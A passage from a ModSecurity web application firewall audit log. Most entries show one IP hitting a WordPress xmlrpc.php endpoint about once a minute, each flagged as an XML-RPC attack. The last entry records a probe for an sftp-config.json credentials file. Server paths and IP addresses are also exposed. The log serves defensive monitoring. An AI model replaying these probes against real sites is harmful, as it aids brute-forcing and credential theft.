"aE7tRd40YvvHR2Fi0mNBlAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003013059736 927718 (- - -) Stopwatch2: 1750003013059736 927718; combined=2147, p1=364, p2=1410, p3=41, p4=65, p5=166, sr=109, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2bf89016-Z-- --5d7b9166-A-- [15/Jun/2025:21:27:54.724626 +0530] aE7tgd40YvvHR2Fi0mNBrAAAAAk 128.199.112.101 59646 127.0.0.1 7081 --5d7b9166-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --5d7b9166-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5d7b9166-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7tgd40YvvHR2Fi0mNBrAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003073801591 923091 (- - -) Stopwatch2: 1750003073801591 923091; combined=2133, p1=287, p2=1446, p3=38, p4=61, p5=191, sr=82, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5d7b9166-Z-- --56add205-A-- [15/Jun/2025:21:28:54.600959 +0530] aE7tvUD4emz4pcZ5aGTjmAAAAAE 128.199.112.101 53418 127.0.0.1 7081 --56add205-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --56add205-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --56add205-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7tvUD4emz4pcZ5aGTjmAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003133690534 910495 (- - -) Stopwatch2: 1750003133690534 910495; combined=2355, p1=378, p2=1529, p3=46, p4=79, p5=201, sr=107, sw=122, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --56add205-Z-- --1f1a6542-A-- [15/Jun/2025:21:29:54.114434 +0530] aE7t-eVVOp7UpcMHtmz4CAAAAAc 128.199.112.101 49202 127.0.0.1 7081 --1f1a6542-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --1f1a6542-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1f1a6542-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7t-eVVOp7UpcMHtmz4CAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003193154133 960392 (- - -) Stopwatch2: 1750003193154133 960392; combined=2502, p1=369, p2=1541, p3=63, p4=96, p5=268, sr=109, sw=165, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1f1a6542-Z-- --6793e241-A-- [15/Jun/2025:21:30:08.887150 +0530] aE7uB10gAfK4E6yok-jcjgAAAA4 157.35.24.44 43572 127.0.0.1 7081 --6793e241-B-- GET /wp-content/uploads/2025/03/banner-yasIsland.jpg%20linear HTTP/1.0 Host: fd.funstay.in X-Real-IP: 157.35.24.44 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua-platform: "Android" user-agent: Mozilla/5.0 (Linux; Android 12; V2029 Build/SP1A.210812.003; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/137.0.7151.61 Mobile Safari/537.36 sec-ch-ua: "Android WebView";v="137", "Chromium";v="137", "Not/A)Brand";v="24" sec-ch-ua-mobile: ?1 accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 x-requested-with: com.gamovation.watersort sec-fetch-site: same-origin sec-fetch-mode: no-cors sec-fetch-dest: image referer: https://fd.funstay.in/yas-island-abudhabi-kidsgofree/?utm_medium=paid&utm_source=an&utm_id=120223934474890259&utm_content=120223934475230259&utm_term=120223934475090259&utm_campaign=120223934474890259&fbclid=IwY2xjawK7zVNleHRuA2FlbQEwAGFkaWQBqx8I1OE74wEeiFNPQgulMDujXbPZGeo0eHmcgzvzMlxlelqHSuzprP4om6ckENiDfV_GSDw_aem_zYVB9h6kymIq_GJgUyTG4Q accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=1, i --6793e241-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://fd.funstay.in/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 17696 Connection: close Content-Type: text/html; charset=UTF-8 --6793e241-H-- Message: collections_remove_stale: Failed deleting collection (name "ip", key "91.151.95.70_c8b4d37b38b1799165338e01276e4a03c6dbe86a"): Internal error (specific information not available) Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: include(/var/www/vhosts/funstay.in/fd.funstay.in/wp-content/advanced-cache.php): Failed to open stream: No such file or directory in /var/www/vhosts/funstay.in/fd.funstay.in/wp-settings.php on line 99; PHP message: PHP Warning: include(): Failed opening '/var/www/vhosts/funstay.in/fd.funstay.in/wp-content/advanced-cache.php' for inclusion (include_path='.:/opt/plesk/php/8.3/share/pear') in /var/www/vhosts/funstay.in/fd.funstay.in/wp-settings.php on line 99' Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "91.151.95.70_c8b4d37b38b1799165338e01276e4a03c6dbe86a"): Internal error (specific information not available) [hostname "fd.funstay.in"] [uri "/index.php"] [unique_id "aE7uB10gAfK4E6yok-jcjgAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/fd.funstay.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003207421010 1466231 (- - -) Stopwatch2: 1750003207421010 1466231; combined=206099, p1=251, p2=1340, p3=0, p4=0, p5=102300, sr=72, sw=1, l=0, gc=102207 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6793e241-Z-- --5e642e3f-A-- [15/Jun/2025:21:30:54.477055 +0530] aE7uNZK-05zbifgH_rQBdwAAAAU 128.199.112.101 47310 127.0.0.1 7081 --5e642e3f-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 496 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --5e642e3f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5e642e3f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7uNZK-05zbifgH_rQBdwAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003253528211 948900 (- - -) Stopwatch2: 1750003253528211 948900; combined=2376, p1=436, p2=1559, p3=45, p4=74, p5=161, sr=108, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e642e3f-Z-- --ec0b3d38-A-- [15/Jun/2025:21:31:54.299919 +0530] aE7ucV0gAfK4E6yok-jc1gAAAA4 128.199.112.101 35186 127.0.0.1 7081 --ec0b3d38-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 493 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --ec0b3d38-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ec0b3d38-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7ucV0gAfK4E6yok-jc1gAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003313387995 911981 (- - -) Stopwatch2: 1750003313387995 911981; combined=2034, p1=408, p2=1258, p3=41, p4=58, p5=168, sr=95, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec0b3d38-Z-- --2ad36140-A-- [15/Jun/2025:21:32:54.032513 +0530] aE7urUD4emz4pcZ5aGTkJAAAAAE 128.199.112.101 57032 127.0.0.1 7081 --2ad36140-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 500 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2ad36140-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2ad36140-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7urUD4emz4pcZ5aGTkJAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003373105897 926671 (- - -) Stopwatch2: 1750003373105897 926671; combined=2840, p1=511, p2=1853, p3=47, p4=71, p5=214, sr=140, sw=144, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ad36140-Z-- --a921a34e-A-- [15/Jun/2025:21:33:54.966549 +0530] aE7u6jNzfFBMRkII6hmluwAAAAI 128.199.112.101 44608 127.0.0.1 7081 --a921a34e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a921a34e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a921a34e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7u6jNzfFBMRkII6hmluwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003434030291 936313 (- - -) Stopwatch2: 1750003434030291 936313; combined=2415, p1=366, p2=1687, p3=34, p4=47, p5=169, sr=98, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a921a34e-Z-- --4515d734-A-- [15/Jun/2025:21:34:55.120684 +0530] aE7vJpK-05zbifgH_rQCAgAAAAU 128.199.112.101 43374 127.0.0.1 7081 --4515d734-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4515d734-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4515d734-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7vJpK-05zbifgH_rQCAgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003494122320 998433 (- - -) Stopwatch2: 1750003494122320 998433; combined=2346, p1=420, p2=1517, p3=40, p4=70, p5=189, sr=131, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4515d734-Z-- --8cba5840-A-- [15/Jun/2025:21:35:55.709548 +0530] aE7vYjtuDRGAAnNiXIearQAAAAg 128.199.112.101 36340 127.0.0.1 7081 --8cba5840-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 503 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --8cba5840-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --8cba5840-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7vYjtuDRGAAnNiXIearQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003554755404 954202 (- - -) Stopwatch2: 1750003554755404 954202; combined=2513, p1=371, p2=1731, p3=42, p4=74, p5=183, sr=109, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8cba5840-Z-- --7baa801e-A-- [15/Jun/2025:21:36:55.951072 +0530] aE7vn0D4emz4pcZ5aGTknAAAAAE 128.199.112.101 57190 127.0.0.1 7081 --7baa801e-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 505 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7baa801e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7baa801e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7vn0D4emz4pcZ5aGTknAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003615003180 947947 (- - -) Stopwatch2: 1750003615003180 947947; combined=2146, p1=397, p2=1369, p3=44, p4=69, p5=167, sr=109, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7baa801e-Z-- --a2399956-A-- [15/Jun/2025:21:37:56.410229 +0530] aE7v2xLQPChAjmM6-0izsgAAAAQ 128.199.112.101 44678 127.0.0.1 7081 --a2399956-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a2399956-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a2399956-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7v2xLQPChAjmM6-0izsgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003675454315 955970 (- - -) Stopwatch2: 1750003675454315 955970; combined=2337, p1=354, p2=1592, p3=40, p4=63, p5=180, sr=97, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a2399956-Z-- --da1cb828-A-- [15/Jun/2025:21:38:57.098557 +0530] aE7wGDNzfFBMRkII6hmmRgAAAAI 128.199.112.101 39708 127.0.0.1 7081 --da1cb828-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --da1cb828-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --da1cb828-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7wGDNzfFBMRkII6hmmRgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750003736125979 972634 (- - -) Stopwatch2: 1750003736125979 972634; combined=2445, p1=348, p2=1596, p3=47, p4=84, p5=221, sr=101, sw=149, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --da1cb828-Z-- --c05d132c-A-- [15/Jun/2025:21:39:06.625507 +0530] aE7wIpK-05zbifgH_rQCjQAAAAU 35.181.152.185 35242 127.0.0.1 7081 --c05d132c-B-- GET /sftp-config.json HTTP/1.0 Host: 3econcepts.cstechns.com X-Real-IP: 35.181.152.185 X-Accel-Internal: /internal-nginx-static-location 